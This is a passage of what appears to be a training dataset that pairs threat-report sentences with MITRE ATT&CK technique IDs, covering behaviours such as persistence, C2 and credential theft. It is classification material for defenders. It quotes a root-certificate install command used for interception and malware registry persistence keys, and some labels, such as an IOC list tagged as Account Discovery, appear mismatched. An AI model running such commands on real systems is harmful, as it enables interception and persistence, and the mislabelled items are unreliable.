framework.,Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Waterbear can use thread injection to inject shellcode into the process of security software.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Msoffice365cdn[.]com resolves to 80.82.79.221, which resides on the same class C network range as the IP resolution of office365-technical[.]info, which resolves to 80.82.79.240### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can execute getinfo to discover the current time on a compromised host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used malware to identify the computer name of a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since domain configuration settings control many of the interactions within the Active Directory environment, there are a great number of potential attacks that can stem from this abuse.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilGrab has the capability to capture video from a victim machine.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok installs a root certificate to aid in Adversary-in-the-Middle actions using the command add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OnionDuke can use a custom decryption algorithm to decrypt strings.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used schtasks to register a scheduled task to execute malware during lateral movement.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DownPaper searches and reads the value of the Windows Update Registry Run key.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InnaputRAT variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has also used a custom user agent HTTP header in shell scripts.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has used lure documents to convince the user to enable macros.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 scans processes on all victim systems in the environment and uses automated scripts to pull back the results.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has used MsiExec.exe to automatically execute files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron has used a malicious Microsoft Exchange transport agent for persistence.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's networks that can be used during targeting.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware used by Group5 is capable of remotely deleting files from victims.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a running process, as seen in Figure 3### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can persist by setting Registry key values HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic and HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs's payload has been encrypted with a key that has the hostname and processor family information appended to the end.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM can harvest cookies and upload them to the C2 server.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT is able to open a remote shell to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adding new capabilities for the adversary’s purpose include Keylogging, Multi-hop Proxy, and Port Knocking.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kivars has the ability to initiate keylogging on the infected host.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has detected security tools.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These files typically require root permissions to modify and are executed each time any shell on a system launches.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT adds a shortcut file to the startup folder for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BONDUPDATER uses a DGA to communicate with command and control servers.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to Impair Defenses while running malicious scripts that may have otherwise been detected.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has frequently used compromised WordPress sites for C2 infrastructure.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has collected system information, including the machine name and OS version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have also used WMI for the remote execution of files for lateral movement.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky has used both HTTP and HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT has the ability to use TCP sockets to send data and ICMP to ping the C2 server.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CopyKittens encrypts data with a substitute cipher prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used DLL search order hijacking.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer can establish persistence through the system screensaver by configuring it to execute the malware.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth can launch itself via DLL Search Order Hijacking.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also hide the rule by making use of the Microsoft Messaging API to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can capture screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has infected victims by tricking them into visiting compromised watering hole websites.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has exploited numerous ActiveX vulnerabilities, including zero-days.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to command-and-control (C&C) servers### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We believe the adversary exploited a recently vulnerability in Microsoft SharePoint tracked by , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has the ability to identify specific files and directories that are not to be encrypted.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT has command line access.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has disguised services to appear as benign software or related to operating system functions.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has used a script to gather credentials in files left on disk by OpenSSH backdoors.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider.### Assistant: T1537: Transfer Data to Cloud Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher can execute additional plugins by loading the respective DLLs.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use ARP cache poisoning as a means to intercept network traffic.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used services.exe to execute scripts and executables during lateral movement within a victim network.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IOCs Domain supservermgr[.]com URL hxxp://supservermgr[.]com/sys/upd/pageupd.php Zebrocy d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 5b5e80f63c04402d0b282e95e32155b2f86cf604a6837853ab467111d4ac15e2 dd7e69e14c88972ac173132b90b3f4bfb2d1faec15cca256a256dd3a12b6e75d Koadic abbad7acd50754f096fdc6551e728aa6054dcf8e55946f90a02b17db552471ca User Agents Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1 IPs 185.25.51[.]198 185.25.50[.]93 220.158.216[.]127 92.114.92[.]102 86.106.131[.]177 DDE Docs 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpyNote RAT builder The SpyNote Remote Access Trojan (RAT) builder is gaining popularity in the hacking community, so we decided to study its pervasiveness### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Background From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The image and table below illustrate TClient’s encrypted configuration that we decrypted (via Python code): Figure 10### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Registry entries in HKLM\Software\\Wow6432Node\\\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used Right-to-Left Override to deceive victims into executing several strains of malware.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Patchwork payload was packed with UPX.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of the documents we examined with the filename Rocket attacks on Israel.docx (SHA256: 34bdb5b364..) contained inconsistent creation and last modified timestamps, with the last modified timestamp occurring before the creation timestamp### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The White Company has checked the current date on the victim system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An example commonly-used sequence is Microsoft's Authorization Code Grant flow.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Visual Basic macro performs the following tasks: Opens a handle to the malicious document to read the encoded CAB file Decodes the CAB file and writes it to the disk at %temp%\setup.cab Encoded CAB file in the Word document### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can schedule tasks via the Windows COM API to maintain persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system.### Assistant: T1080: Taint Shared Content" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist can use GetUserNameW, GetComputerNameW, and GetComputerNameExW to gather information.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,net user ### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Lazarus Group malware sample encodes data with base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command and control To traverse the firewall, C2 traffic for most TG-3390 tools occurs over ports 53, 80, and 443### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon attempts to overwrite operating system files and disk structures with image files.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cryptoistic can engage in encrypted communications with C2.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT has been distributed as HTA files with VBScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy, lease, or rent physical servers that can be used during targeting.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has used a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used protocol tunneling for communication and RDP activity on compromised hosts through the use of open source tools such as Ngrok and custom tool SSHMinion.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal has a command to gather system information from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has exploited the CVE-2016-0167 local vulnerability.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework., nbtstat ### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has used TCP to download additional modules.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,.cpl### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can delete files from a compromised host after they are exfiltrated.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PittyTiger attempts to obtain legitimate credentials during operations.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D has used the ioreg command to gather some of this information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT logs the keystrokes on the targeted system.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used web services including OneHub to distribute remote access tools.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FALLCHILL can collect operating system version information, processor information, system name, and information about installed disks from the victim.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ""tDiscoverer"" variant of HAMMERTOSS establishes a C2 channel by downloading resources from Web services like Twitter and GitHub.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHOTPUT has a command to retrieve information about connected users.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware SierraAlfa uses the Windows Management Instrumentation Command-line application wmic to start itself on a target system during lateral movement.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used trojanized documents that retrieve remote templates from an adversary-controlled website.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec has a plugin that can perform ARP scanning as well as port scanning.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used type \\\c$\Users\\Favorites\Links\Bookmarks bar\Imported From IE\*citrix* for bookmark discovery.### Assistant: T1217: Browser Bookmark Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javascript ### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORALDECK searches for specified files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JSS Loader has the ability to launch scheduled tasks to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,overwrite or delete MBR in same sentence ### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has XOR-encrypted collected system information prior to sending to a C2.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth web shell command set### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used spearphishing via a link to get users to download and run their malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used different compromised credentials for remote access and to move laterally.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has staged stolen data locally on compromised hosts.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has the ability to encrypt system data and add the "".cuba"" extension to encrypted files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used cmd.exe for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another variation of this technique is to utilize temporary storage attached to the compute instance.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest installs a launch item using an embedded encrypted launch agent property list template.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although deprecated, the TxF application programming interface is still enabled as of Windows 10.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has gathered information about local network connections using netstat.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rather than creating and cultivating accounts Establish Accounts, adversaries may compromise existing accounts.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They have also used IP addresses originating from the same country as the victim for their VPN infrastructure.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK encrypts C2 communications with TLS.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz has been distributed through an AutoIt loader script.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The benefit of this is that it allows users to go back to commands they've used before in different sessions.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify plist files to automatically run an application when a user logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHARPSTATS has the ability to employ a custom PowerShell script.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can run DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DOGCALL can capture microphone data from the victim's machine.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use PubPrn to proxy execution of malicious remote files.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used the command-line interface for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credentials are typically accessible after a user provides a master password that unlocks the database.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UPPERCUT has the capability to collect the current logged on user’s username from a machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has encrypted strings with a single byte XOR algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoxCaon can execute arbitrary commands and utilize the ""ComSpec"" environment variable.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The command tab will show previously issued commands, when they were issued, and their status, as seen in Figure 4### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu can track key presses with a keylogger module.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail can use the open command to execute an application.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell or remote desktop protocol .### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the size is 7 bytes or more, the backdoor verifies that the command and control server sent an encoded package### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth can create a new process in a suspended state from a targeted legitimate process in order to unmap its memory and replace it with malicious code.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaRicto employed nmap and pscan to scan target environments.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy has the ability to compress stolen data into a .cab file.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,33 Download specified file to %TEMP%\up and execute it in a new process   During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has used HTTPS over port 443 for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS has a command to download an .exe and execute it via CreateProcess API.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda checks for running processes on the victim’s machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has attempted to lure victims into opening malicious email attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette can check for the presence of 29 different antivirus tools.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackTech has used e-mails with malicious documents to lure victims into installing malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 used the commands net start and tasklist to get a listing of the services on the system.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK 